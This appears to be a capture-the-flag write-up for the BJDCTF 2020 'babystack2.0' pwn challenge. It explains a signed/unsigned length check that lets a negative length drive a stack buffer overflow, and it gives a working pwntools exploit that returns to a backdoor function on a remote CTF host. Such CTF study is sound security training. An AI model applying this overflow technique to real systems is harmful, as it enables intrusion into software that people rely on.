[BJDCTF 2020]babystack2.0

1
2
3
4
5
6
[*] '/mnt/e/work/PWN/nssctf/709_[BJDCTF 2020]babystack2.0/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

ida64

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[12]; // [rsp+0h] [rbp-10h] BYREF
  size_t nbytes; // [rsp+Ch] [rbp-4h] BYREF

  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  LODWORD(nbytes) = 0;
  puts("**********************************");
  puts("*     Welcome to the BJDCTF!     *");
  puts("* And Welcome to the bin world!  *");
  puts("*  Let's try to pwn the world!   *");
  puts("* Please told me u answer loudly!*");
  puts("[+]Are u ready?");
  puts("[+]Please input the length of your name:");
  __isoc99_scanf("%d", &nbytes);
  if ( (int)nbytes > 10 )
  {
    puts("Oops,u name is too long!");
    exit(-1);
  }
  puts("[+]What's u name?");
  read(0, buf, (unsigned int)nbytes);
  return 0;
}

__isoc99_scanf("%d", &nbytes);需要io.sendlineafter("your name:","xx")

防止太多(int)nbytes > 10目的为了进行下一步

read(0, buf, (unsigned int)nbytes);漏出点注意的是read能读的量是nbytes 被定义为unsigned int 所以我们能否让nbytes为-1?

同样找到backdoor可以用elf.sym("backdoor")查找函数地址 从ida中查找也可以

注意io.sendlineafter(‘your name:’,’xx’)

编写exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *
#from LibcSearcher import *
context(
    terminal=["wt.exe","wsl"],
    os = "linux",
    arch = "amd64",
    #arch = "i386",
    log_level="debug",
)
elf = ELF("./pwn")
#io = process("./pwn")
io = remote("node4.anna.nssctf.cn",28444)
def debug():
    gdb.attach(io)
    pause()
#debug()
backdoor_address = elf.sym['backdoor']
io.sendlineafter("your name:",'-1')
payload = cyclic(0x10+0x8)+p64(backdoor_address)
io.sendline(payload)
io.interactive()